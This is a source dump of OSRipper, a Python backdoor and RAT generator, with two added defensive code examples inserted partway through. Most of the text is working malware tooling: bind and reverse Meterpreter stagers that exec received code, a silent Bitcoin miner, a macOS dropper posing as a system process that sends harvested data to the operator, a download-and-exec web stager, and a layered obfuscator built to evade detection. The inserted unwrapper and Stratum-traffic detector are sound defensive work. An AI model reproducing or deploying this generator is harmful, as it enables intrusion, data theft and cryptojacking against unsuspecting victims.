░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒▓▓▒▒░░░░▓▓▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 105 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒▒░░░░░▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 106 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 107 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 108 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 109 | OSRIPPER v0.2.5 110 | """ 111 | logo2 = """ 112 | ▄▀▀▀▀▄ ▄▀▀▀▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄▀▀▀▄ 113 | █ █ █ █ ▐ █ █ █ █ █ █ █ █ █ █ █ █ ▐ ▄▀ ▐ █ █ █ 114 | █ █ ▀▄ ▐ █▀▀█▀ ▐ █ ▐ ▐ █▀▀▀▀ ▐ █▀▀▀▀ █▄▄▄▄▄ ▐ █▀▀█▀ 115 | ▀▄ ▄▀ ▀▄ █ ▄▀ █ █ █ █ █ ▌ ▄▀ █ 116 | ▀▀▀▀ █▀▀▀ █ █ ▄▀▀▀▀▀▄ ▄▀ ▄▀ ▄▀▄▄▄▄ █ █ 117 | ▐ ▐ ▐ █ █ █ █ █ ▐ ▐ ▐ 118 | ▐ ▐ ▐ ▐ ▐ 119 | 120 | """ 121 | logo3 = """ 122 | 123 | ,-.----. ,----.. 124 | ,-.----. ,---,\ / \ / / \ .--.--. ,--, ,--, 125 | \ / \ ,`--.' || : \ / . : / / '. |'. \ / .`| 126 | ; : \| : :| | .\ : . / ;. \ : /`. / ; \ `\ /' / ; 127 | | | .\ :: | '. : |: | . ; / ` ; | |--` `. \ / / .' 128 | . : |: || : || | \ : ; | ; \ ; | : ;_ \ \/ / ./ 129 | | | \ :' ' ;| : . / | : | ; | '\ \ `. \ \.' / 130 | | : . /| | |; | |`-' . | ' ' ' : `----. \ \ ; ; 131 | ; | | ' : ;| | ; ' ; \; / | __ \ \ | / \ \ \ 132 | | | ;\ \ | ': ' | \ \ ', / / /`--' / ; /\ \ \ 133 | : ' | \.' : |: : : ; : / '--'. /./__; \ ; \ 134 | : : :-' ; |.' | | : \ \ .' `--'---' | : / \ \ ; 135 | | |.' '---' `---'.| `---` ; |/ \ ' | 136 | `---' `---` `---' `--` 137 | 138 | """ 139 | logo4 = """ 140 | .=-.-. _ __ _,.---._ ,-,--. ,-.--, 141 | .-.,.---. /==/_ /.-`.' ,`. ,-.' , - `. ,-.'- _\.--.-. /=/, .' 142 | /==/ ` \|==|, |/==/, - \ /==/_, , - \/==/_ ,_.'\==\ -\/=/- / 143 | |==|-, .=., |==| |==| _ .=. | |==| .=. \==\ \ \==\ `-' ,/ 144 | |==| '=' /==|- |==| , '=',| |==|_ : ;=: - |\==\ -\ |==|, - | 145 | |==|- , .'|==| ,|==|- '..' |==| , '=' |_\==\ ,\ /==/ , \ 146 | |==|_ . 
,'.|==|- |==|, | \==\ - ,_ //==/\/ _ |/==/, .--, - \
/==/ /\ , )==/. /==/ - | '.='. - .' \==\ - , /\==\- \/=/ , /
`--`-`--`--'`--`-``--`---' `--`--'' `--`---' `--`-' `--`

"""

    logolist = [logo1, logo2, logo3, logo4]
    print(random.choice(logolist))


def move_file_to_directory(file_path, destination_directory):
    shutil.move(file_path, destination_directory)
clear = lambda: os.system("clear")
clear()
logo()


def listen(host, port):

    SERVER_HOST = host
    SERVER_PORT = int(port)
    # send 1024 (1kb) a time (as buffer size)
    BUFFER_SIZE = 1024 * 128  # 128KB max size of messages, feel free to increase
    # separator string for sending 2 messages in one go
    SEPARATOR = ""

    # create a socket object
    s = socket.socket()
    # bind the socket to all IP addresses of this host
    s.bind((SERVER_HOST, SERVER_PORT))
    # make the PORT reusable
    # when you run the server multiple times in Linux, Address already in use error will raise
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.listen(5)
    print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")

    # accept any connections attempted
    client_socket, client_address = s.accept()

    # receiving the current working directory of the client
    cwd = client_socket.recv(BUFFER_SIZE).decode()
    print("[+] Current working directory:", cwd)

    while True:
        # get the command from prompt
        command = input(f"{cwd} $> ")
        if not command.strip():
            # empty command
            continue
        # send the command to the client
        client_socket.send(command.encode())
        if command.lower() == "exit":
            # if the command is exit, just break out of the loop
            break
        # retrieve command results
        output = client_socket.recv(BUFFER_SIZE).decode()
        print("output:", output)
        # split command output and current directory
        results, cwd = output.split(SEPARATOR)
        # print output
        print(results)
    # close connection to the client
    client_socket.close()
    # close server connection
    s.close()


def gen_bind():

    global port
    global bind
    global name
    name = "ocr"
    port = input(
        "Please enter the port number you wish the backdoor to listen on (recomended between 1024-65353): "
    )
    bind = "1"
    with open(name, "a+") as ina:
        ina.write("port = " + str(port) + "\n")
        a = """
import zlib,base64,socket,struct,time
def main():
    try:
        b=socket.socket(2,socket.SOCK_STREAM)
        b.bind(('0.0.0.0',int(port)))
        b.listen(1)
        s,a=b.accept()
        l=struct.unpack('>I',s.recv(4))[0]
        d=s.recv(l)
        while len(d)I',"""
            + s
            + """.recv(4))[0]
"""
            + dr
            + """="""
            + s
            + """.recv("""
            + l
            + """)
while len("""
            + dr
            + """)<"""
            + l
            + """:
"""
            + dr
            + """+="""
            + s
            + """.recv("""
            + l
            + """-len("""
            + dr
            + """))
exec(zlib.decompress(base64.b64decode("""
            + dr
            + """)),{'s':"""
            + s
            + """})
"""
        )
        ina.write(b2)

        opt_bind = input("Do you want to bind another program to this Backdoor?(y/n): ")
        if opt_bind == "y":
            bind_file = input(
                "Please enter the name (in same dir) of the .py you want to bind: "
            )
            with open(bind_file, "r") as bindfile:
                bindfilecontent = bindfile.read()
                ina.write(bindfilecontent)
                bindfile.close

    print("(*) Generated Backdoor and saved as " + name)


def gen_custom():
    customshell = input("Please enter the file name containing your code: ")
    global name
    name = "ocr"

    with open(customshell, "r") as cuso:
        with open(name, "a+") as ina:
            for line in cuso:
                ina.write(line)

            opt_bind = input("Do you want to bind another program to this Backdoor?(y/n): ")
            if opt_bind == "y":
                bind_file = input(
                    "Please enter the name (in same dir) of the .py you want to bind: "
                )
                with open(bind_file, "r") as bindfile:
                    bindfilecontent = bindfile.read()
                    ina.write(bindfilecontent)
                    bindfile.close

    print("(*) Generated Backdoor and saved as " + name)


def gen_btc_miner():
    global name
    global host
    name = "ocr"
    addy = input("Please enter the payout btc address: ")
    with open(name, "a+") as ina:
        ina.write('addy = "' + addy + '"\n')
        b = r"""

import socket
import json
import hashlib
import binascii
from pprint import pprint
import time
import random
def main():
    address = addy
    nonce = hex(random.randint(0,2**32-1))[2:].zfill(8)

    host = 'solo.ckpool.org'
    port = 3333

    #print("address:{} nonce:{}".format(address,nonce))
    #print("host:{} port:{}".format(host,port))

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host,port))

    #server connection
    sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": []}\n')
    lines = sock.recv(1024).decode().split('\n')
    response = json.loads(lines[0])
    sub_details,extranonce1,extranonce2_size = response['result']

    #authorize workers
    sock.sendall(b'{"params": ["'+address.encode()+b'", "password"], "id": 2, "method": "mining.authorize"}\n')

    #we read until 'mining.notify' is reached
    response = b''
    while response.count(b'\n') < 4 and not(b'mining.notify' in response):
        response += sock.recv(1024)


    #get rid of empty lines
    responses = [json.loads(res) for res in response.decode().split('\n') if len(res.strip())>0 and 'mining.notify' in res]
    #pprint(responses)

    job_id,prevhash,coinb1,coinb2,merkle_branch,version,nbits,ntime,clean_jobs \
        = responses[0]['params']

    #target https://bitcoin.stackexchange.com/a/36228/44319
    target = (nbits[2:]+'00'*(int(nbits[:2],16) - 3)).zfill(64)
    #print('nbits:{} target:{}\n'.format(nbits,target))

    extranonce2 = '00'*extranonce2_size

    coinbase = coinb1 + extranonce1 + extranonce2 + coinb2
    coinbase_hash_bin = hashlib.sha256(hashlib.sha256(binascii.unhexlify(coinbase)).digest()).digest()

    #print('coinbase:\n{}\n\ncoinbase hash:{}\n'.format(coinbase,binascii.hexlify(coinbase_hash_bin)))
    merkle_root = coinbase_hash_bin
    for h in merkle_branch:
        merkle_root = hashlib.sha256(hashlib.sha256(merkle_root + binascii.unhexlify(h)).digest()).digest()

    merkle_root = binascii.hexlify(merkle_root).decode()

    #little endian
    merkle_root = ''.join([merkle_root[i]+merkle_root[i+1] for i in range(0,len(merkle_root),2)][::-1])

    #print('merkle_root:{}\n'.format(merkle_root))

    blockheader = version + prevhash + merkle_root + nbits + ntime + nonce +\
        '000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000'

    #print('blockheader:\n{}\n'.format(blockheader))

    hash = hashlib.sha256(hashlib.sha256(binascii.unhexlify(blockheader)).digest()).digest()
    hash = binascii.hexlify(hash).decode()
    #print('hash: {}'.format(hash))

    if hash < target :
        #print('success!!')
        payload = '{"params": ["'+address+'", "'+job_id+'", "'+extranonce2 \
            +'", "'+ntime+'", "'+nonce+'"], "id": 1, "method": "mining.submit"}\n'
        sock.sendall(payload)
        #print(sock.recv(1024))
    else:
        main()

    sock.close()
main()

"""
        ina.write(b)


def postgen():
    opt_obf = input(
        "Do you want to obfuscate the generated programm (recommended) (y/n): "
    )
    global encrypted
    encrypted = False
    b = "".join(
        secrets.choice(string.ascii_uppercase + string.ascii_lowercase)
        for i in range(13)
    )
    if opt_obf == "y":
        encrypted = True
        import obfuscator

        obfuscator.MainMenu(name)
    compiling = input(
        "Do you want to compile the script into a binary (might require sudo) (y/n): "
    )
    if compiling == "y":
        global icochoice
        icochoice = input(
            "Enter .ico path to set a custom icon (press enter for default): "
        )
        if encrypted == True:
            if icochoice:
                compcomd = (
                    "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --macos-onefile-icon="
                    + icochoice
                    + " --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle "
                    + name
                    + "_or.py"
                )
                os.system(compcomd)
                print('Saved under "dist" folder')
            else:
                compcomd = (
                    "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle "
                    + name
                    + "_or.py"
                )
                os.system(compcomd)
                print('Saved under "dist" folder')

        else:
            if icochoice:
                compcomd = (
                    "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --macos-onefile-icon="
                    + icochoice
                    + " --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle "
                    + name
                )
                os.system(compcomd)
                print('Saved under "dist" folder')
            else:
                compcomd = (
                    "python3 -m nuitka --standalone --include-module=sandboxed --disable-console --windows-disable-console --onefile --assume-yes-for-downloads --macos-create-app-bundle "
                    + name
                )
                os.system(compcomd)
                print('Saved under "dist" folder')
    print(logo)
    print('Backdoor saved under "dist" folder')

def start_web_server(webroot):
    command = ["python3", "-m", "http.server", "--directory", webroot]

    # Start the web server as a background process
    subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)


def rep_syst():
    hide = input(
        "Do you want the backdoor to hide itself and replicate a system proccess? (OSX and linux (aarch64) only and doesnt support ngrok) (y/n): "
    )
    if hide == "y":
        global name2
        global reps
        reps = True
        if bind == "1":
            host2 = "localhost"
        else:
            host2 = host
        name2 = input("Please enter the name for the rat: ")
        icochoice = input(
            "Enter .ico path to set a custom icon (press enter for default): "
        )
        with open(name2, "a+") as hider:
            hider.write(str('host = "' + host2 + '"\n'))
            v = """
import os
import shutil
import time
directory_path = os.getcwd()
folder_name = os.path.basename(directory_path)
anan= __file__
filename = anan.split('/')
a=anan.replace(str(filename[-1]), '')
src1=a+'swiftbelt/Swiftbelt'
src=a+'ocr/Contents/MacOS/ocr_or'
dest1='/Users/Shared/swift'
dest='/Users/Shared/com.apple.system.monitor'
shutil.copyfile(src, dest)
shutil.copy(src1, dest1)
os.system('chmod u+x '+dest1)
os.system(dest1+' > /users/shared/output.txt')
time.sleep(10)

import socket
import sys


ServerIp = host



# Now we can create socket object
s = socket.socket()

# Lets choose one port and connect to that port
PORT = 9898

# Lets connect to that port where server may be running
s.connect((ServerIp, PORT))

# We can send file sample.txt
file = open("/users/shared/output.txt", "rb")
SendData = file.read(1024)


while SendData:
    # Now we can receive data from server
    #Now send the content of sample.txt to server
    s.send(SendData)
    SendData = file.read(1024)

# Close the connection from client side
s.close()
#print('connection closed')
os.system('chmod u+x '+dest)
os.system(dest)

"""
            hider.write(v)
            hider.close()
        import obfuscator

        obfuscator.MainMenu(name2)
        if icochoice:
            os.system(
                "sudo pyinstaller -i "
                + icochoice
                + ' --windowed --hidden-import imp --hidden-import socket --hidden-import urllib3 --hidden-import setproctitle --add-data "SwiftBelt:swiftbelt" --add-data "ocr_or.app:ocr" '
                + str(name2)
                + "_or.py"
            )

        else:
            os.system(
                'sudo pyinstaller --windowed --hidden-import imp --hidden-import socket --hidden-import urllib3 --hidden-import setproctitle --add-data "SwiftBelt:swiftbelt" --add-data "ocr_or.app:ocr" '
                + str(name2)
                + "_or.py"
            )


def server():
    import socket

    # Now we can create socket object
    s = socket.socket()

    # Lets choose one port and start listening on that port
    PORT = 9898
    print("\n Server is listening on port :", PORT, "\n")

    # Now we need to bind to the above port at server side
    s.bind(("", PORT))

    # Now we will put server into listening mode
    s.listen(10)

    # Open one recv.txt file in write mode
    file = open("recv.txt", "wb")
    # print("\n Copied file name will be recv.txt at server side\n")

    # We do not know when the client will contact the server, so the server should be listening continuously
    while True:
        # Now we can establish connection with client
        conn, addr = s.accept()

        # Send a hello message to client
        # msg = "\n\n|---------------------------------|\n Hi Client[IP address: "+ addr[0] + "], \n ֲֳ**Welcome to Server** \n -Server\n|---------------------------------|\n \n\n"
        # conn.send(msg.encode())

        # Receive any data from client side
        RecvData = conn.recv(1024)
        while RecvData:
            file.write(RecvData)
            RecvData = conn.recv(1024)

        # Close the file opened at server side once copy is completed
        file.close()
        print("\n File has been copied successfully \n")

        # Close connection with client
        conn.close()
        print("\n Server closed the connection \n")

        # Come out from the infinite while loop as the file has been copied from client.
        break


def cleanup():
    try:
        if reps == False:
            os.remove("ocr.py")
            os.remove("ocr_or.py")
            os.remove("ocr_or.spec")
        if reps == True:
            os.remove(name2)
            os.remove(name2 + ".spec")
            os.remove("ocr.py")
            os.remove("ocr_or.py")
            os.remove("ocr_or.spec")
            if platform.system() == "Windows":
                shutil.rmtree(os.getcwd() + "/dist/ocr_or.exe")
            else:
                shutil.rmtree(os.getcwd() + "/dist/" + name2)
    except FileNotFoundError:
        pass

def webdelivery():
    with open ("backdoor.py","a+") as outs:
        specf="destin='http://"+host+":8000/ocr_or.py'"
        websc= """
import requests
import subprocess
import time
import random
def download_and_run_script(url):
    response = requests.get(url)
    script_content = response.text
    exec(script_content)

script_url = destin
download_and_run_script(script_url)
"""
        outs.write(specf)
        outs.write(websc)
    import obfuscator
    obfuscator.MainMenu("backdoor.py")
    os.system("python3 -m nuitka --standalone --include-module=sandboxed --disable-console --onefile --assume-yes-for-downloads backdoor_or.py")
print(
    """

1. Create Bind Backdoor (opens a port on the victim machine and waits for you to connect)
2. Create Encrypted TCP Meterpreter (can embed in other script) (recommended)
3. Crypt custom code
##########################################################################################
Miners
4. Create a silent BTC miner
##########################################################################################
Staged Payloads
5. Create Encrypted Meterpreter (staged)

"""
)
encrypted = False
nscan = input("Please select a module: ")
if nscan == "1":
    gen_bind()
    postgen()
    cleanup()
    os.system("clear")
    print("Generated in dist")
    a = "use python/meterpreter/bind_tcp in metasploit to connect to target"
    print(a)
if nscan == "2":
    clear()
    logo()
    print(
        "##########################################################################################"
    )
    print("Generating")
    gen_rev_ssl_tcp()
    clear()
    logo()
    print(
        "##########################################################################################"
    )
    print("Specifying")
    postgen()
    clear()
    logo()
    print(
        "##########################################################################################"
    )
    print("RootKit")
    rep_syst()
    if reps == True:
        print("Generated in dist")
        print(
            "OSRipper will now wait for the Victim to launch the Backdoor. As soon as they do you will see a file called recv.txt with all the data that has been pulled of the target"
        )
        print("After that the listener will spawn instantly")
        server()
        print("wait...")
        a = (
            "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT "
            + port
            + "; exploit'"
        )
        os.system(a)
    else:
        print("wait...")
        a = (
            "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT "
            + port
            + "; exploit'"
        )
        os.system(a)
if nscan == "3":
    gen_custom()
    postgen()
    rep_syst()
if nscan == "4":
    gen_btc_miner()
    opt_obf = input(
        "Do you want to obfuscate the generated programm (recommended) (y/n): "
    )
    print(
        "obfuscating... (might take a few minutes due to the layer based obfuscation)"
    )
    encrypted = False
    if opt_obf == "y":
        encrypted = True
        import obfuscator

        obfuscator.MainMenu(name)
    compiling = input(
        "Do you want to compile the script into a binary (might require sudo) (y/n): "
    )
    if compiling == "y":
        if encrypted == True:
            compcomd = (
                "pyinstaller -F --windowed --hidden-import socket --hidden-import json --hidden-import pprint --hidden-import hashlib --hidden-import binascii "
                + name
                + "_or.py"
            )
            os.system(compcomd)
            print('Saved under "dist" folder')
        else:
            compcomd = (
                "pyinstaller -F --windowed --hidden-import socket --hidden-import json --hidden-import pprint --hidden-import hashlib --hidden-import binascii "
                + name
            )
            os.system(compcomd)
    os.system(clear)
    print(logo)
    print('Miner saved under "dist" folder')
    print("You can monitor your `miners` here : https://solo.ckpool.org/")
    cleanup()
if nscan == "5":
    clear()
    logo()
    print(
        "##########################################################################################"
    )
    print("Generating")
    gen_rev_ssl_tcp()
    clear()
    logo()
    print(
        "##########################################################################################"
    )


    b = "".join(
        secrets.choice(string.ascii_uppercase + string.ascii_lowercase)
        for i in range(13)
    )

    encrypted = True
    import obfuscator

    obfuscator.MainMenu(name)
    file_path = "ocr_or.py"
    destination_directory = "webroot"
    move_file_to_directory(file_path, destination_directory)
    webdelivery()
    webroot = "webroot"
    start_web_server(webroot)
    print("web server started in the beackground on port 8000. the backdoor is saved as backdoor_or.py and if you have compiled it it will be in the nuitka folder")
    print("wait...")
    a = (
        "msfconsole -q -x 'use multi/handler;set payload python/meterpreter/reverse_tcp_ssl;set LHOST 0.0.0.0; set LPORT "
        + port
        + "; exploit'"
    )
    os.system(a)


else:
    print("Please select a vaild option")
--------------------------------------------------------------------------------
/obfuscator.py:
--------------------------------------------------------------------------------
import os
import sys
import zlib
import time
import base64
import marshal
import py_compile
import random
import secrets
a=random.randint(50,70)
randint = UltimateRandomNumberlow2 = secrets.randbelow(2)
if sys.version_info[0]==2:
    _input = "raw_input('%s')"
elif sys.version_info[0]==3:
    _input = "input('%s')"


zlb = lambda in_ : zlib.compress(in_)
b16 = lambda in_ : base64.b16encode(in_)
b32 = lambda in_ : base64.b32encode(in_)
b64 = lambda in_ : base64.b64encode(in_)
mar = lambda in_ : marshal.dumps(compile(in_,'','exec'))

class FileSize:
    def datas(self,z):
        for x in ['Byte','KB','MB','GB']:
            if z < 1024.0:
                return "%3.1f %s" % (z,x)
            z /= 1024.0
    def __init__(self,path):
        if os.path.isfile(path):
            dts = os.stat(path).st_size
            print('\n')
            print(" [-] Encoded File Size : %s\n" % self.datas(dts))

def Encode(data,output):
    loop = int(eval(str(a)))

    x1 = "b32(zlb(data.encode('utf8')))[::-1]"
    heading1 = "_ = lambda __ : __import__('zlib').decompress(__import__('base64').b32decode(__[::-1]));"
    x2 = "b64(zlb(data.encode('utf8')))[::-1]"
    heading2 = "_ = lambda __ : __import__('zlib').decompress(__import__('base64').b64decode(__[::-1]));"


    for x in range(loop):
        try:
            data = "exec((_)(%s))" % repr(eval(x1))
        except TypeError as s:
            sys.exit(" TypeError : " + str(s))
    ab=(heading1 + data)
    for x in range(loop):
        try:
            data = "exec((_)(%s))" % repr(eval(x2))
        except TypeError as s:
            sys.exit(" TypeError : " + str(s))
    abc=(heading2 + ab)
    with open(output, 'w') as f:
        f.write(abc)
        f.close()

def SEncode(data,output):
    for x in range(5):
        method = repr(b64(zlb(mar(data.encode('utf8'))))[::-1])
        data = "exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b64decode(%s[::-1]))))" % method
    z = []
    for i in data:
        z.append(ord(i))
    sata = "_ = %s\nexec(''.join(chr(__) for __ in _))" % z
    with open(output, 'w') as f:
        f.write("exec(str(chr(35)%s));" % '+chr(1)'*10000)
        f.write(sata)
        f.close()
    py_compile.compile(output,output)

def MainMenu(file):

    try:
        data = open(file).read()
    except IOError:
        sys.exit("\n File Not Found!")
    output = file.lower().replace('.py', '') + '_or.py'
    Encode(data,output)
    FileSize(output)


if __name__ == "__main__":
    MainMenu()
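The Encode() routine above produces a fixed, recognisable shape: one or two `_ = lambda __ : ...` header definitions (the b64 header is immediately shadowed by the b32 one, since both bind the same name) followed by 50 to 70 nested `exec((_)(b'...'))` layers, each a reversed base32 encoding of zlib-compressed text. An analyst who recovers such a file does not need to run it: the bytes literal can be read with `ast.literal_eval`, reversed, decoded and inflated, and the process repeated until the inner source appears. The following static unwrapper is an added example written for this page; it is not part of the OSRipper repository. Function names (`strip_headers`, `unwrap`, `looks_like_osripper_wrapper`) and the `build_sample` fixture builder are this example's own; `build_sample` only mirrors the layering scheme shown above so that the unwrapper can be exercised on constructed input offline.

```python
import ast
import base64
import re
import zlib

# Header that obfuscator.py prepends (once per codec); each one rebinds `_`, so the
# last header in the file is the decoder the exec() layers actually use.
HEADER_RE = re.compile(
    r"_ = lambda __ : __import__\('zlib'\)\.decompress\("
    r"__import__\('base64'\)\.b(32|64)decode\(__\[::-1\]\)\);"
)
# One wrapping layer: exec((_)(b'<reversed base32/base64 of zlib data>'))
LAYER_RE = re.compile(r"\s*exec\(\(_\)\((b'[A-Z2-7a-z0-9+/=]*')\)\)\s*$")
DECODERS = {"32": base64.b32decode, "64": base64.b64decode}
MAX_LAYER_BYTES = 32 * 1024 * 1024  # per-layer cap: a hostile sample could be a zlib bomb


def strip_headers(text):
    """Remove leading header definitions; return (codec of the last one, remaining text)."""
    codec = None
    while True:
        m = HEADER_RE.match(text.lstrip())
        if not m:
            return codec, text
        codec = m.group(1)
        text = text.lstrip()[m.end():]


def looks_like_osripper_wrapper(text):
    """Cheap static signature: a header definition plus at least one exec((_)(...)) layer."""
    return HEADER_RE.search(text) is not None and "exec((_)(" in text


def unwrap(text, max_layers=1000):
    """Peel every layer without executing anything. Returns (layers_removed, inner_source)."""
    codec, body = strip_headers(text)
    if codec is None:
        return 0, body
    decode = DECODERS[codec]
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.match(body)
        if not m:
            break
        blob = ast.literal_eval(m.group(1))  # parses the bytes literal only; never exec()
        inflater = zlib.decompressobj()
        raw = inflater.decompress(decode(blob[::-1]), MAX_LAYER_BYTES)
        if inflater.unconsumed_tail:
            raise ValueError("layer %d exceeds the size cap" % (layers + 1))
        body = raw.decode("utf8")
        layers += 1
    return layers, body


def build_sample(source, layers):
    """Constructed test fixture (this example's own) mirroring Encode(): b32 layers behind both headers."""
    data = source
    for _ in range(layers):
        blob = base64.b32encode(zlib.compress(data.encode("utf8")))[::-1]
        data = "exec((_)(%s))" % repr(blob)
    header64 = ("_ = lambda __ : __import__('zlib').decompress("
                "__import__('base64').b64decode(__[::-1]));")
    header32 = ("_ = lambda __ : __import__('zlib').decompress("
                "__import__('base64').b32decode(__[::-1]));")
    return header64 + header32 + data


if __name__ == "__main__":
    sample = build_sample("print('constructed sample')\n", 5)
    print(looks_like_osripper_wrapper(sample), unwrap(sample))
```

`looks_like_osripper_wrapper` is the cheap triage check to run over a suspicious `.py` or a string extracted from a PyInstaller/Nuitka bundle; `unwrap` recovers the inner script for review. The decompression cap matters because each layer is attacker-controlled input, and `ast.literal_eval` is used rather than `eval` for the same reason.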
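The miner stub that gen_btc_miner() in main.py writes out talks plain Stratum JSON-RPC to `solo.ckpool.org:3333`: `mining.subscribe`, then `mining.authorize` with the payout address as the worker name, then `mining.submit`. Because those requests are unencrypted newline-delimited JSON, a defender with payload visibility (a proxy, Zeek, or an EDR network sensor) can both flag the session and pull out the payout address as an indicator. The detector below is an added example for this page, not project code; the record format (`dst`, `dport`, `data`) and the sample flows are constructed, and the worker string in them is a placeholder rather than a real address.

```python
import json

STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty",
}

# Constructed sample of outbound payload records. Pool host/port match the page's
# miner stub; the worker name is a placeholder, not a real address.
SAMPLE_FLOWS = [
    {"dst": "solo.ckpool.org", "dport": 3333,
     "data": '{"id": 1, "method": "mining.subscribe", "params": []}'},
    {"dst": "solo.ckpool.org", "dport": 3333,
     "data": '{"params": ["bc1qplaceholderworker", "password"], "id": 2, "method": "mining.authorize"}'},
    {"dst": "example.org", "dport": 443, "data": "GET / HTTP/1.1"},       # unrelated traffic
    {"dst": "solo.ckpool.org", "dport": 3333, "data": "garbage {not json"},  # must not crash the parser
]


def parse_stratum(line):
    """Return (method, params) if the line is a Stratum JSON-RPC request, else None."""
    try:
        msg = json.loads(line)
    except ValueError:
        return None
    if not isinstance(msg, dict):
        return None
    method = msg.get("method")
    if method not in STRATUM_METHODS:
        return None
    params = msg.get("params")
    return method, (params if isinstance(params, list) else [])


def summarize_mining(flows):
    """Collect pool endpoints, the method sequence and worker names seen in the flows."""
    pools, methods, workers = set(), [], set()
    for flow in flows:
        parsed = parse_stratum(flow["data"])
        if parsed is None:
            continue
        method, params = parsed
        pools.add("%s:%d" % (flow["dst"], flow["dport"]))
        methods.append(method)
        # authorize and submit carry the worker (here the payout address) as the first parameter
        if method in ("mining.authorize", "mining.submit") and params and isinstance(params[0], str):
            workers.add(params[0])
    return {
        "pools": sorted(pools),
        "methods": methods,
        "workers": sorted(workers),
        # subscribe followed by authorize is the handshake every Stratum miner performs
        "mining_session": "mining.subscribe" in methods and "mining.authorize" in methods,
    }


if __name__ == "__main__":
    print(summarize_mining(SAMPLE_FLOWS))
```

The `workers` field is the most useful output: the same payout address reused across hosts ties separate infections to one operator, and it can be searched for in other telemetry without depending on the pool hostname.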
--------------------------------------------------------------------------------
/obfuscator2.py:
--------------------------------------------------------------------------------
import ast
import random
def yamam(original_code):
    class Obfuscator(ast.NodeTransformer):
        def __init__(self):
            self.names_map = {}

        def obfuscate_name(self, name):
            # Simple renaming scheme, can be made more complex
            if name not in self.names_map:
                obfuscated_name = f"var_{random.randint(1000, 9999)}"
                self.names_map[name] = obfuscated_name
            return self.names_map[name]

        def visit_FunctionDef(self, node):
            node.name = self.obfuscate_name(node.name)
            self.generic_visit(node)
            return node

        def visit_Name(self, node):
            if isinstance(node.ctx, ast.Store):
                node.id = self.obfuscate_name(node.id)
            return node

    def obfuscate_code(source_code):
        tree = ast.parse(source_code)
        obfuscator = Obfuscator()
        obfuscated_tree = obfuscator.visit(tree)
        obfuscated_code = ast.unparse(obfuscated_tree)
        return obfuscated_code

    # Example usage



--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
Nuitka
tinyaes
pprintpp
zstandard
sandboxed
pyinstaller
ngrok-api
pyngrok
ordered-set
--------------------------------------------------------------------------------
/ripgrok.py:
--------------------------------------------------------------------------------
import ngrok

# This isn't the official ngrok library. This is merely my way to parse out the tunnel host and ip from the ngrok api
# Subglitch1

def find_between( s, first, last ):
    try:
        start = s.index( first ) + len( first )
        end = s.index( last, start )
        return s[start:end]
    except ValueError:
        return ""

def find_between_r( s, first, last ):
    try:
        start = s.rindex( first ) + len( first )
        end = s.rindex( last, start )
        return s[start:end]
    except ValueError:
        return ""
def get_tunnels():
    # construct the api client
    with open('creds', 'r') as credfile:
        ngrok_auth=credfile.readline()
    client = ngrok.Client(ngrok_auth)

    # list all online tunnels
    for t in client.tunnels.list():
        with open('tmp.txt', 'w+') as tmp:
            out = str(t)
            tmp.write(out)
        with open('tmp.txt', 'r') as tmp:
            anan = tmp.readline()
            return find_between(anan, "tcp://", "', 'started_at':")
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
import platform
import sys
import os
print('Welcome to the osripper setup utility')


print("""Python version: %s
system: %s
machine: %s
platform: %s
version: %s
""" % (
    sys.version.split('\n'),
    platform.system(),
    platform.machine(),
    platform.platform(),
    platform.version(),
))

if platform.system() == "Darwin":
    print("MacOS detected... Ultimate Compatibility")
    ngchoice=input('Do you want to install with ngrok support? (y/n): ')
    # `ngchoice=='y' or 'Y'` was always true; test both spellings explicitly
    if ngchoice in ('y', 'Y'):
        print('You will need your ngrok Api key (not the tunnel key)')
        print('You can get this key for free from here https://dashboard.ngrok.com/api')
        print('\n')
        ngrok_auth = input('Please enter your key: ')
        os.system("pip3 install -r requirements.txt")
        with open('creds', 'w+') as creds:
            creds.write(str(ngrok_auth))
        ngrok_activation='ngrok authtoken '+ngrok_auth
        os.system(ngrok_activation)
if platform.system() == "Windows":
    print("This version does NOT support windows. Please use an older version.")
    sys.exit(1)
elif platform.system() == "Linux":
    print("Linux Detected ... Great")
    ngchoice=input('Do you want to install with ngrok support? (y/n): ')
    if ngchoice in ('y', 'Y'):
        print('You will need your ngrok Api key (not the tunnel key)')
